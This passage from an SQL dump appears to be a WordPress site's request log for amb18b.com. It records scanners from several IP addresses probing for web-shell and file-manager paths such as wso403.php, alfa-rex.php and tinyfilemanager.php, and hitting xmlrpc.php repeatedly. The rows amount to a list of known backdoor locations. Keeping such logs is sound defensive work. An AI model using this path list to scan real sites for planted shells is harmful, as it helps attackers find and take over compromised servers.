20:40:11'),(7681,'https://amb18b.com/asasx.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:13','2025-11-17 20:40:13'),(7682,'https://amb18b.com/lc.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:14','2025-11-17 20:40:14'),(7683,'https://amb18b.com/mo.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:15','2025-11-17 20:40:15'),(7684,'https://amb18b.com/nij.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:16','2025-11-17 20:40:16'),(7685,'https://amb18b.com/gfile.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:18','2025-11-17 20:40:18'),(7686,'https://amb18b.com/xpas2.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:19','2025-11-17 20:40:19'),(7687,'https://amb18b.com/filemanager.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:20','2025-11-17 20:40:20'),(7688,'https://amb18b.com/x.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:22','2025-11-17 20:40:22'),(7689,'https://amb18b.com/asd67.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:23','2025-11-17 20:40:23'),(7690,'https://amb18b.com/alam.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:25','2025-11-17 20:40:25'),(7691,'https://amb18b.com/700.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:26','2025-11-17 20:40:26'),(7692,'https://amb18b.com/fifi.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:28','2025-11-17 20:40:28'),(7693,'https://amb18b.com/wp-signup.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:31','2025-11-17 20:40:31'),(7694,'https://amb18b.com/gold.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:32','2025-11-17 20:40:32'),(7695,'https://amb18b.com/blurbs8.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:35','2025-11-17 20:40:35'),(7696,'https://amb18b.com/sid.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:37','2025-11-17 20:40:37'),(7697,'https://amb18b.com/tinyfilemanager.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:39','2025-11-17 20:40:39'),(7698,'https://amb18b.com/unity.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:41','2025-11-17 20:40:41'),(7699,'https://amb18b.com/cf.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:45','2025-11-17 20:40:45'),(7700,'https://amb18b.com/get.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:47','2025-11-17 20:40:47'),(7701,'https://amb18b.com/v3.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:48','2025-11-17 20:40:48'),(7702,'https://amb18b.com/.well-known/ws.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:51','2025-11-17 20:40:51'),(7703,'https://amb18b.com/wteed.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:54','2025-11-17 20:40:54'),(7704,'https://amb18b.com/nc4.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:57','2025-11-17 20:40:57'),(7705,'https://amb18b.com/ntgn.php','130.33.77.13','Direct Access',1,'2025-11-17 20:41:00','2025-11-17 20:41:00'),(7706,'https://amb18b.com/ioxi-o.php','130.33.77.13','Direct Access',1,'2025-11-17 20:41:03','2025-11-17 20:41:03'),(7707,'https://amb18b.com/ws.php','130.33.77.13','Direct Access',1,'2025-11-17 20:41:05','2025-11-17 20:41:05'),(7708,'https://amb18b.com/7h.php','130.33.77.13','Direct Access',1,'2025-11-17 20:41:08','2025-11-17 20:41:08'),(7709,'https://amb18b.com/gg.php','130.33.77.13','Direct Access',1,'2025-11-17 20:41:10','2025-11-17 20:41:10'),(7710,'https://amb18b.com/co.php','130.33.77.13','Direct Access',1,'2025-11-17 20:41:14','2025-11-17 20:41:14'),(7711,'https://amb18b.com/mjq.php','130.33.77.13','Direct Access',1,'2025-11-17 20:41:18','2025-11-17 20:41:18'),(7712,'https://amb18b.com/rdfe.php','130.33.77.13','Direct Access',1,'2025-11-17 20:41:20','2025-11-17 20:41:20'),(7713,'https://amb18b.com/xojryvch.php','130.33.77.13','Direct Access',1,'2025-11-17 20:41:22','2025-11-17 20:41:22'),(7714,'https://amb18b.com/reyna.php','130.33.77.13','Direct Access',1,'2025-11-17 20:41:25','2025-11-17 20:41:25'),(7715,'https://amb18b.com/css/index.php','130.33.77.13','Direct Access',1,'2025-11-17 20:41:27','2025-11-17 20:41:27'),(7716,'https://amb18b.com/unzip.php','130.33.77.13','Direct Access',1,'2025-11-17 20:41:31','2025-11-17 20:41:31'),(7717,'https://amb18b.com/cool.php','130.33.77.13','Direct Access',1,'2025-11-17 20:41:35','2025-11-17 20:41:35'),(7718,'https://amb18b.com/.well-known/xin1.php?p','130.33.77.13','Direct Access',1,'2025-11-17 20:41:40','2025-11-17 20:41:40'),(7719,'https://amb18b.com/axx.php','130.33.77.13','Direct Access',1,'2025-11-17 20:41:43','2025-11-17 20:41:43'),(7720,'https://amb18b.com/w3llstore.php','130.33.77.13','Direct Access',1,'2025-11-17 20:41:46','2025-11-17 20:41:46'),(7721,'https://amb18b.com/aua.php','130.33.77.13','Direct Access',1,'2025-11-17 20:41:48','2025-11-17 20:41:48'),(7722,'https://amb18b.com/c4.php','130.33.77.13','Direct Access',1,'2025-11-17 20:41:50','2025-11-17 20:41:50'),(7723,'https://amb18b.com/bu5.php','130.33.77.13','Direct Access',1,'2025-11-17 20:41:51','2025-11-17 20:41:51'),(7724,'https://amb18b.com/lhh2.php','130.33.77.13','Direct Access',1,'2025-11-17 20:41:53','2025-11-17 20:41:54'),(7725,'https://amb18b.com/an.php','130.33.77.13','Direct Access',1,'2025-11-17 20:41:56','2025-11-17 20:41:56'),(7726,'https://amb18b.com/aw.php','130.33.77.13','Direct Access',1,'2025-11-17 20:41:58','2025-11-17 20:41:58'),(7727,'https://amb18b.com/as.php','130.33.77.13','Direct Access',1,'2025-11-17 20:42:03','2025-11-17 20:42:03'),(7728,'https://amb18b.com/new.php','130.33.77.13','Direct Access',1,'2025-11-17 20:42:06','2025-11-17 20:42:06'),(7729,'https://amb18b.com/Okxob.php','130.33.77.13','Direct Access',1,'2025-11-17 20:42:09','2025-11-17 20:42:09'),(7730,'https://amb18b.com/ahax.php','130.33.77.13','Direct Access',1,'2025-11-17 20:42:11','2025-11-17 20:42:11'),(7731,'https://amb18b.com/cache.php','130.33.77.13','Direct Access',1,'2025-11-17 20:42:13','2025-11-17 20:42:13'),(7732,'https://amb18b.com/ffile.php','130.33.77.13','Direct Access',1,'2025-11-17 20:42:15','2025-11-17 20:42:15'),(7733,'https://amb18b.com/nxac.php','130.33.77.13','Direct Access',1,'2025-11-17 20:42:17','2025-11-17 20:42:17'),(7734,'https://amb18b.com/thh.php','130.33.77.13','Direct Access',1,'2025-11-17 20:42:21','2025-11-17 20:42:21'),(7735,'https://amb18b.com/wp-includes/buy.php','130.33.77.13','Direct Access',1,'2025-11-17 20:42:23','2025-11-17 20:42:23'),(7736,'https://amb18b.com/baxa1.phP8','130.33.77.13','Direct Access',1,'2025-11-17 20:42:26','2025-11-17 20:42:26'),(7737,'https://amb18b.com/lo.php','130.33.77.13','Direct Access',1,'2025-11-17 20:42:30','2025-11-17 20:42:30'),(7738,'https://amb18b.com/fb.php','130.33.77.13','Direct Access',1,'2025-11-17 20:42:46','2025-11-17 20:42:46'),(7739,'https://amb18b.com/wp-update.php','130.33.77.13','Direct Access',1,'2025-11-17 20:42:51','2025-11-17 20:42:51'),(7740,'https://amb18b.com/slo.php','130.33.77.13','Direct Access',1,'2025-11-17 20:42:55','2025-11-17 20:42:55'),(7741,'https://amb18b.com/dropdown.php','130.33.77.13','Direct Access',1,'2025-11-17 20:42:56','2025-11-17 20:42:56'),(7742,'https://amb18b.com/pp.php','130.33.77.13','Direct Access',1,'2025-11-17 20:42:58','2025-11-17 20:42:58'),(7743,'https://amb18b.com/bqcheck.php','130.33.77.13','Direct Access',1,'2025-11-17 20:43:01','2025-11-17 20:43:01'),(7744,'https://amb18b.com/13k.php','130.33.77.13','Direct Access',1,'2025-11-17 20:43:03','2025-11-17 20:43:03'),(7745,'https://amb18b.com/ar.php','130.33.77.13','Direct Access',1,'2025-11-17 20:43:05','2025-11-17 20:43:05'),(7746,'https://amb18b.com/bv3.php','130.33.77.13','Direct Access',1,'2025-11-17 20:43:08','2025-11-17 20:43:08'),(7747,'https://amb18b.com/aa.php','130.33.77.13','Direct Access',1,'2025-11-17 20:43:11','2025-11-17 20:43:11'),(7748,'https://amb18b.com/racs3.php','130.33.77.13','Direct Access',1,'2025-11-17 20:43:14','2025-11-17 20:43:14'),(7749,'https://amb18b.com/content.php','130.33.77.13','Direct Access',1,'2025-11-17 20:43:18','2025-11-17 20:43:18'),(7750,'https://amb18b.com/lufix.php','130.33.77.13','Direct Access',1,'2025-11-17 20:43:22','2025-11-17 20:43:22'),(7751,'https://amb18b.com/bluejackets.php','130.33.77.13','Direct Access',1,'2025-11-17 20:43:25','2025-11-17 20:43:25'),(7752,'https://amb18b.com/zt2.php','130.33.77.13','Direct Access',1,'2025-11-17 20:43:26','2025-11-17 20:43:26'),(7753,'https://amb18b.com/f35.php','130.33.77.13','Direct Access',1,'2025-11-17 20:43:29','2025-11-17 20:43:29'),(7754,'https://amb18b.com/wp-mn.php','130.33.77.13','Direct Access',1,'2025-11-17 20:43:31','2025-11-17 20:43:31'),(7755,'https://amb18b.com/modules/mod_simplefileuploadv1.3/elements/wpxadmin.php','130.33.77.13','Direct Access',1,'2025-11-17 20:43:35','2025-11-17 20:43:35'),(7756,'https://amb18b.com/aa8.php','130.33.77.13','Direct Access',1,'2025-11-17 20:43:37','2025-11-17 20:43:37'),(7757,'https://amb18b.com/xl.php','130.33.77.13','Direct Access',1,'2025-11-17 20:43:40','2025-11-17 20:43:40'),(7758,'https://amb18b.com/r4f_1.php','130.33.77.13','Direct Access',1,'2025-11-17 20:43:42','2025-11-17 20:43:42'),(7759,'https://amb18b.com/sarang.php','130.33.77.13','Direct Access',1,'2025-11-17 20:43:46','2025-11-17 20:43:46'),(7760,'https://amb18b.com/6.php','130.33.77.13','Direct Access',1,'2025-11-17 20:44:06','2025-11-17 20:44:06'),(7761,'https://amb18b.com/xo.php','130.33.77.13','Direct Access',1,'2025-11-17 20:44:18','2025-11-17 20:44:18'),(7762,'https://amb18b.com/ggs.php','130.33.77.13','Direct Access',1,'2025-11-17 20:44:23','2025-11-17 20:44:23'),(7763,'https://amb18b.com/wsr2.php?p=','130.33.77.13','Direct Access',1,'2025-11-17 20:44:25','2025-11-17 20:44:25'),(7764,'https://amb18b.com/class9.php','130.33.77.13','Direct Access',1,'2025-11-17 20:44:26','2025-11-17 20:44:26'),(7765,'https://amb18b.com/public/wsr2.php','130.33.77.13','Direct Access',1,'2025-11-17 20:44:30','2025-11-17 20:44:30'),(7766,'https://amb18b.com/tcp.php','130.33.77.13','Direct Access',1,'2025-11-17 20:44:31','2025-11-17 20:44:31'),(7767,'https://amb18b.com/witmm.php','130.33.77.13','Direct Access',1,'2025-11-17 20:44:33','2025-11-17 20:44:33'),(7768,'https://amb18b.com/fm.php','130.33.77.13','Direct Access',1,'2025-11-17 20:44:35','2025-11-17 20:44:35'),(7769,'https://amb18b.com/jga.php','130.33.77.13','Direct Access',1,'2025-11-17 20:44:38','2025-11-17 20:44:38'),(7770,'https://amb18b.com/nxx.php','130.33.77.13','Direct Access',1,'2025-11-17 20:44:39','2025-11-17 20:44:39'),(7771,'https://amb18b.com/aaaa.php','130.33.77.13','Direct Access',1,'2025-11-17 20:44:41','2025-11-17 20:44:41'),(7772,'https://amb18b.com/2.php','130.33.77.13','Direct Access',1,'2025-11-17 20:44:43','2025-11-17 20:44:43'),(7773,'https://amb18b.com/ss.php','130.33.77.13','Direct Access',1,'2025-11-17 20:44:45','2025-11-17 20:44:45'),(7774,'https://amb18b.com/zc.php','130.33.77.13','Direct Access',1,'2025-11-17 20:44:47','2025-11-17 20:44:47'),(7775,'https://amb18b.com/dex.php','130.33.77.13','Direct Access',1,'2025-11-17 20:44:48','2025-11-17 20:44:48'),(7776,'https://amb18b.com/sad.php','130.33.77.13','Direct Access',1,'2025-11-17 20:44:50','2025-11-17 20:44:50'),(7777,'https://amb18b.com/wp.php','130.33.77.13','Direct Access',1,'2025-11-17 20:45:08','2025-11-17 20:45:08'),(7778,'https://amb18b.com/wp-gr.php','130.33.77.13','Direct Access',1,'2025-11-17 20:45:14','2025-11-17 20:45:14'),(7779,'https://amb18b.com/cfile.php','130.33.77.13','Direct Access',1,'2025-11-17 20:45:17','2025-11-17 20:45:17'),(7780,'https://amb18b.com/sder52u.php','130.33.77.13','Direct Access',1,'2025-11-17 20:45:19','2025-11-17 20:45:19'),(7781,'https://amb18b.com/asserter.php','130.33.77.13','Direct Access',1,'2025-11-17 20:45:21','2025-11-17 20:45:21'),(7782,'https://amb18b.com/ol.php','130.33.77.13','Direct Access',1,'2025-11-17 20:45:23','2025-11-17 20:45:23'),(7783,'https://amb18b.com/pass.php','130.33.77.13','Direct Access',1,'2025-11-17 20:45:26','2025-11-17 20:45:26'),(7784,'https://amb18b.com/l.php','130.33.77.13','Direct Access',1,'2025-11-17 20:45:28','2025-11-17 20:45:28'),(7785,'https://amb18b.com/ot.php','130.33.77.13','Direct Access',1,'2025-11-17 20:45:31','2025-11-17 20:45:31'),(7786,'https://amb18b.com/wp-rss4.php','130.33.77.13','Direct Access',1,'2025-11-17 20:45:34','2025-11-17 20:45:34'),(7787,'https://amb18b.com/dev.php','130.33.77.13','Direct Access',1,'2025-11-17 20:45:36','2025-11-17 20:45:36'),(7788,'https://amb18b.com/bin.php','130.33.77.13','Direct Access',1,'2025-11-17 20:45:39','2025-11-17 20:45:39'),(7789,'https://amb18b.com/yee.php','130.33.77.13','Direct Access',1,'2025-11-17 20:45:41','2025-11-17 20:45:41'),(7790,'https://amb18b.com/epinyins.php','130.33.77.13','Direct Access',1,'2025-11-17 20:45:43','2025-11-17 20:45:43'),(7791,'https://amb18b.com/aa17.php','130.33.77.13','Direct Access',1,'2025-11-17 20:45:45','2025-11-17 20:45:45'),(7792,'https://amb18b.com/winkel.php','130.33.77.13','Direct Access',1,'2025-11-17 20:45:47','2025-11-17 20:45:47'),(7793,'https://amb18b.com/ef.php','130.33.77.13','Direct Access',1,'2025-11-17 20:45:49','2025-11-17 20:45:49'),(7794,'https://amb18b.com/gifclass4.php','130.33.77.13','Direct Access',1,'2025-11-17 20:45:51','2025-11-17 20:45:51'),(7795,'https://amb18b.com/667.php','130.33.77.13','Direct Access',1,'2025-11-17 20:45:53','2025-11-17 20:45:53'),(7796,'https://amb18b.com/we.php','130.33.77.13','Direct Access',1,'2025-11-17 20:45:56','2025-11-17 20:45:56'),(7797,'https://amb18b.com/wp-su.php','130.33.77.13','Direct Access',1,'2025-11-17 20:45:58','2025-11-17 20:45:58'),(7798,'https://amb18b.com/t3x.php','130.33.77.13','Direct Access',1,'2025-11-17 20:45:59','2025-11-17 20:45:59'),(7799,'https://amb18b.com/13.php','130.33.77.13','Direct Access',1,'2025-11-17 20:46:01','2025-11-17 20:46:01'),(7800,'https://amb18b.com/yasnu.php','130.33.77.13','Direct Access',1,'2025-11-17 20:46:03','2025-11-17 20:46:03'),(7801,'https://amb18b.com/trd.php','130.33.77.13','Direct Access',1,'2025-11-17 20:46:04','2025-11-17 20:46:04'),(7802,'https://amb18b.com/oiepfuav.php','130.33.77.13','Direct Access',1,'2025-11-17 20:46:06','2025-11-17 20:46:06'),(7803,'https://amb18b.com/02.php','130.33.77.13','Direct Access',1,'2025-11-17 20:46:07','2025-11-17 20:46:07'),(7804,'https://amb18b.com/file2.php','130.33.77.13','Direct Access',1,'2025-11-17 20:46:08','2025-11-17 20:46:08'),(7805,'https://amb18b.com/makeasmtp.php','130.33.77.13','Direct Access',1,'2025-11-17 20:46:10','2025-11-17 20:46:10'),(7806,'https://amb18b.com/upload.php','130.33.77.13','Direct Access',1,'2025-11-17 20:46:12','2025-11-17 20:46:12'),(7807,'https://amb18b.com/btufulhs.php','130.33.77.13','Direct Access',1,'2025-11-17 20:46:15','2025-11-17 20:46:15'),(7808,'https://amb18b.com/ant.php','130.33.77.13','Direct Access',1,'2025-11-17 20:46:18','2025-11-17 20:46:18'),(7809,'https://amb18b.com/bb5.php','130.33.77.13','Direct Access',1,'2025-11-17 20:46:34','2025-11-17 20:46:34'),(7810,'https://amb18b.com/akc.php','130.33.77.13','Direct Access',1,'2025-11-17 20:46:44','2025-11-17 20:46:44'),(7811,'https://amb18b.com/s.php','130.33.77.13','Direct Access',1,'2025-11-17 20:46:53','2025-11-17 20:46:53'),(7812,'https://amb18b.com/yzkvrell.php','130.33.77.13','Direct Access',1,'2025-11-17 20:46:57','2025-11-17 20:46:57'),(7813,'https://amb18b.com/gmo.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:00','2025-11-17 20:47:00'),(7814,'https://amb18b.com/zc-749.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:02','2025-11-17 20:47:02'),(7815,'https://amb18b.com/.well-known/fm.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:03','2025-11-17 20:47:03'),(7816,'https://amb18b.com/ava.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:04','2025-11-17 20:47:04'),(7817,'https://amb18b.com/nqsa.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:06','2025-11-17 20:47:06'),(7818,'https://amb18b.com/2020.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:07','2025-11-17 20:47:07'),(7819,'https://amb18b.com/rak.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:09','2025-11-17 20:47:09'),(7820,'https://amb18b.com/bypass.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:10','2025-11-17 20:47:10'),(7821,'https://amb18b.com/zr.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:12','2025-11-17 20:47:12'),(7822,'https://amb18b.com/wander.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:13','2025-11-17 20:47:13'),(7823,'https://amb18b.com/lock360.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:16','2025-11-17 20:47:16'),(7824,'https://amb18b.com/great.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:17','2025-11-17 20:47:17'),(7825,'https://amb18b.com/fifii.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:18','2025-11-17 20:47:18'),(7826,'https://amb18b.com/12.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:19','2025-11-17 20:47:19'),(7827,'https://amb18b.com/efile.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:20','2025-11-17 20:47:20'),(7828,'https://amb18b.com/past1.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:22','2025-11-17 20:47:22'),(7829,'https://amb18b.com/7.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:23','2025-11-17 20:47:23'),(7830,'https://amb18b.com/4563.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:25','2025-11-17 20:47:25'),(7831,'https://amb18b.com/re.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:26','2025-11-17 20:47:26'),(7832,'https://amb18b.com/up.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:27','2025-11-17 20:47:27'),(7833,'https://amb18b.com/35.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:29','2025-11-17 20:47:29'),(7834,'https://amb18b.com/witm.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:31','2025-11-17 20:47:31'),(7835,'https://amb18b.com/atomlib.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:32','2025-11-17 20:47:32'),(7836,'https://amb18b.com/bless2.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:34','2025-11-17 20:47:34'),(7837,'https://amb18b.com/new4.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:35','2025-11-17 20:47:35'),(7838,'https://amb18b.com/wsr2.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:36','2025-11-17 20:47:36'),(7839,'https://amb18b.com/shlo.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:38','2025-11-17 20:47:38'),(7840,'https://amb18b.com/CLA.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:39','2025-11-17 20:47:39'),(7841,'https://amb18b.com/kill-9-1.php','130.33.77.13','Direct Access',1,'2025-11-17 20:47:40','2025-11-17 20:47:40'),(7842,'https://amb18b.com/txets.php','136.144.19.46','Direct Access',1,'2025-11-18 00:25:30','2025-11-18 00:25:30'),(7843,'https://amb18b.com/wp-admin/txets.php','136.144.19.79','Direct Access',1,'2025-11-18 00:25:37','2025-11-18 00:25:37'),(7844,'https://amb18b.com/xmlrpc.php','196.189.155.34','Direct Access',1,'2025-11-18 05:06:23','2025-11-18 05:06:23'),(7845,'https://amb18b.com/xmlrpc.php','103.159.85.119','Direct Access',9,'2025-11-18 05:26:46','2025-11-18 05:15:58'),(7846,'https://amb18b.com/xmlrpc.php','185.8.176.230','Direct Access',1,'2025-11-18 05:36:44','2025-11-18 05:36:44'),(7847,'https://amb18b.com/xmlrpc.php','185.48.182.96','Direct Access',1,'2025-11-18 05:52:35','2025-11-18 05:52:35'),(7848,'https://amb18b.com/xmlrpc.php','50.6.153.191','Direct Access',1,'2025-11-18 06:34:06','2025-11-18 06:34:06'),(7849,'https://amb18b.com/xmlrpc.php','162.0.208.67','Direct Access',1,'2025-11-18 07:13:31','2025-11-18 07:13:31'),(7850,'https://amb18b.com/xmlrpc.php','103.78.97.230','Direct Access',1,'2025-11-18 07:22:41','2025-11-18 07:22:41'),(7851,'https://amb18b.com/xmlrpc.php','148.66.155.82','Direct Access',1,'2025-11-18 07:33:43','2025-11-18 07:33:43'),(7852,'https://amb18b.com/xmlrpc.php','35.225.238.220','Direct Access',1,'2025-11-18 07:54:49','2025-11-18 07:54:49'),(7853,'https://amb18b.com/xmlrpc.php','41.73.206.99','Direct Access',7,'2025-11-18 07:55:52','2025-11-18 07:54:56'),(7854,'https://amb18b.com/xmlrpc.php','212.227.40.119','Direct Access',1,'2025-11-18 08:31:44','2025-11-18 08:31:44'),(7855,'https://amb18b.com/xmlrpc.php','27.254.134.98','Direct Access',3,'2025-11-18 08:33:38','2025-11-18 08:33:05'),(7856,'https://amb18b.com/xmlrpc.php','201.46.112.136','Direct Access',2,'2025-11-18 08:50:59','2025-11-18 08:50:39'),(7857,'https://amb18b.com/xmlrpc.php','94.250.251.7','Direct Access',1,'2025-11-18 09:02:22','2025-11-18 09:02:22'),(7858,'https://amb18b.com/xmlrpc.php','95.154.198.138','Direct Access',1,'2025-11-18 09:14:28','2025-11-18 09:14:28'),(7859,'https://amb18b.com/xmlrpc.php','130.193.77.35','Direct Access',1,'2025-11-18 09:32:35','2025-11-18 09:32:35'),(7860,'https://amb18b.com/xmlrpc.php','223.165.66.10','Direct Access',1,'2025-11-18 09:59:21','2025-11-18 09:59:21'),(7861,'https://amb18b.com/xmlrpc.php','46.182.4.125','Direct Access',1,'2025-11-18 10:24:50','2025-11-18 10:24:50'),(7862,'https://amb18b.com/yas.php','13.74.149.244','Direct Access',1,'2025-11-18 10:39:34','2025-11-18 10:39:34'),(7863,'https://amb18b.com/x.php','13.74.149.244','Direct Access',2,'2025-11-18 10:42:44','2025-11-18 10:39:37'),(7864,'https://amb18b.com/002.php','13.74.149.244','Direct Access',1,'2025-11-18 10:39:38','2025-11-18 10:39:38'),(7865,'https://amb18b.com/lite.php','13.74.149.244','Direct Access',1,'2025-11-18 10:39:40','2025-11-18 10:39:40'),(7866,'https://amb18b.com/as.php','13.74.149.244','Direct Access',1,'2025-11-18 10:39:43','2025-11-18 10:39:43'),(7867,'https://amb18b.com/16.php','13.74.149.244','Direct Access',1,'2025-11-18 10:39:45','2025-11-18 10:39:45'),(7868,'https://amb18b.com/333.php','13.74.149.244','Direct Access',1,'2025-11-18 10:39:48','2025-11-18 10:39:48'),(7869,'https://amb18b.com/wp-admin/maint/maint.php','13.74.149.244','Direct Access',1,'2025-11-18 10:39:50','2025-11-18 10:39:50'),(7870,'https://amb18b.com/wso403.php','13.74.149.244','Direct Access',1,'2025-11-18 10:39:52','2025-11-18 10:39:52'),(7871,'https://amb18b.com/bless.php','13.74.149.244','Direct Access',1,'2025-11-18 10:40:01','2025-11-18 10:40:01'),(7872,'https://amb18b.com/2.php','13.74.149.244','Direct Access',1,'2025-11-18 10:40:07','2025-11-18 10:40:07'),(7873,'https://amb18b.com/an.php','13.74.149.244','Direct Access',1,'2025-11-18 10:40:13','2025-11-18 10:40:13'),(7874,'https://amb18b.com/item.php','13.74.149.244','Direct Access',1,'2025-11-18 10:40:17','2025-11-18 10:40:17'),(7875,'https://amb18b.com/0x1949.php','13.74.149.244','Direct Access',1,'2025-11-18 10:40:19','2025-11-18 10:40:19'),(7876,'https://amb18b.com/3.php','13.74.149.244','Direct Access',1,'2025-11-18 10:40:23','2025-11-18 10:40:23'),(7877,'https://amb18b.com/size.php','13.74.149.244','Direct Access',1,'2025-11-18 10:40:27','2025-11-18 10:40:27'),(7878,'https://amb18b.com/epinyins.php','13.74.149.244','Direct Access',1,'2025-11-18 10:40:30','2025-11-18 10:40:30'),(7879,'https://amb18b.com/wp-includes/Requests/Cookie/alfa-rex.php','13.74.149.244','Direct Access',1,'2025-11-18 10:40:33','2025-11-18 10:40:33'),(7880,'https://amb18b.com/ar.php','13.74.149.244','Direct Access',1,'2025-11-18 10:40:41','2025-11-18 10:40:41'),(7881,'https://amb18b.com/tiny.php?p=','13.74.149.244','Direct Access',1,'2025-11-18 10:40:43','2025-11-18 10:40:43'),(7882,'https://amb18b.com/ova.php','13.74.149.244','Direct Access',1,'2025-11-18 10:40:46','2025-11-18 10:40:46'),(7883,'https://amb18b.com/404.php','13.74.149.244','Direct Access',1,'2025-11-18 10:40:49','2025-11-18 10:40:49'),(7884,'https://amb18b.com/11.php','13.74.149.244','Direct Access',1,'2025-11-18 10:40:53','2025-11-18 10:40:53'),(7885,'https://amb18b.com/wp-includes/sim.php','13.74.149.244','Direct Access',1,'2025-11-18 10:40:58','2025-11-18 10:40:58'),(7886,'https://amb18b.com/about.php','13.74.149.244','Direct Access',1,'2025-11-18 10:41:01','2025-11-18 10:41:01'),(7887,'https://amb18b.com/update/nf.php','13.74.149.244','Direct Access',1,'2025-11-18 10:41:03','2025-11-18 10:41:03'),(7888,'https://amb18b.com/about/function.php','13.74.149.244','Direct Access',1,'2025-11-18 10:41:06','2025-11-18 10:41:06'),(7889,'https://amb18b.com/suu.php','13.74.149.244','Direct Access',1,'2025-11-18 10:41:09','2025-11-18 10:41:09'),(7890,'https://amb18b.com/user/info.php','13.74.149.244','Direct Access',1,'2025-11-18 10:41:24','2025-11-18 10:41:24'),(7891,'https://amb18b.com/ay.php','13.74.149.244','Direct Access',1,'2025-11-18 10:41:28','2025-11-18 10:41:28'),(7892,'https://amb18b.com/classwithtostring.php','13.74.149.244','Direct Access',1,'2025-11-18 10:41:32','2025-11-18 10:41:32'),(7893,'https://amb18b.com/wp-mt.php','13.74.149.244','Direct Access',1,'2025-11-18 10:41:38','2025-11-18 10:41:38'),(7894,'https://amb18b.com/cong.php','13.74.149.244','Direct Access',1,'2025-11-18 10:41:40','2025-11-18 10:41:40'),(7895,'https://amb18b.com/al.php','13.74.149.244','Direct Access',1,'2025-11-18 10:41:43','2025-11-18 10:41:43'),(7896,'https://amb18b.com/ww.php','13.74.149.244','Direct Access',1,'2025-11-18 10:41:45','2025-11-18 10:41:45'),(7897,'https://amb18b.com/about/function.php?','13.74.149.244','Direct Access',1,'2025-11-18 10:41:48','2025-11-18 10:41:48'),(7898,'https://amb18b.com/wp-admin/maint/14.php','13.74.149.244','Direct Access',1,'2025-11-18 10:41:50','2025-11-18 10:41:50'),(7899,'https://amb18b.com/wp-includes/SimplePie/wp-login.php','13.74.149.244','Direct Access',1,'2025-11-18 10:41:52','2025-11-18 10:41:52'),(7900,'https://amb18b.com/wp-22.php','13.74.149.244','Direct Access',1,'2025-11-18 10:41:55','2025-11-18 10:41:55'),(7901,'https://amb18b.com/asus.php','13.74.149.244','Direct Access',1,'2025-11-18 10:41:57','2025-11-18 10:41:57'),(7902,'https://amb18b.com/wp-includes/88.php','13.74.149.244','Direct Access',1,'2025-11-18 10:41:58','2025-11-18 10:41:58'),(7903,'https://amb18b.com/chosen.php?p=','13.74.149.244','Direct Access',1,'2025-11-18 10:42:00','2025-11-18 10:42:00'),(7904,'https://amb18b.com/wp-includes/pomo/secure.php','13.74.149.244','Direct Access',1,'2025-11-18 10:42:04','2025-11-18 10:42:04'),(7905,'https://amb18b.com/firewall.php7','13.74.149.244','Direct Access',1,'2025-11-18 10:42:07','2025-11-18 10:42:07'),(7906,'https://amb18b.com/marijuana.php?','13.74.149.244','Direct Access',1,'2025-11-18 10:42:09','2025-11-18 10:42:09'),(7907,'https://amb18b.com/wp-class.php','13.74.149.244','Direct Access',1,'2025-11-18 10:42:11','2025-11-18 10:42:11'),(7908,'https://amb18b.com/wp-admin/includes/wp-login.php','13.74.149.244','Direct Access',1,'2025-11-18 10:42:12','2025-11-18 10:42:12'),(7909,'https://amb18b.com/111.php','13.74.149.244','Direct Access',1,'2025-11-18 10:42:17','2025-11-18 10:42:17'),(7910,'https://amb18b.com/eror.php','13.74.149.244','Direct Access',1,'2025-11-18 10:42:19','2025-11-18 10:42:19'),(7911,'https://amb18b.com/sym403.php','13.74.149.244','Direct Access',1,'2025-11-18 10:42:21','2025-11-18 10:42:21'),(7912,'https://amb18b.com/wp-admin/maint/item.php','13.74.149.244','Direct Access',1,'2025-11-18 10:42:23','2025-11-18 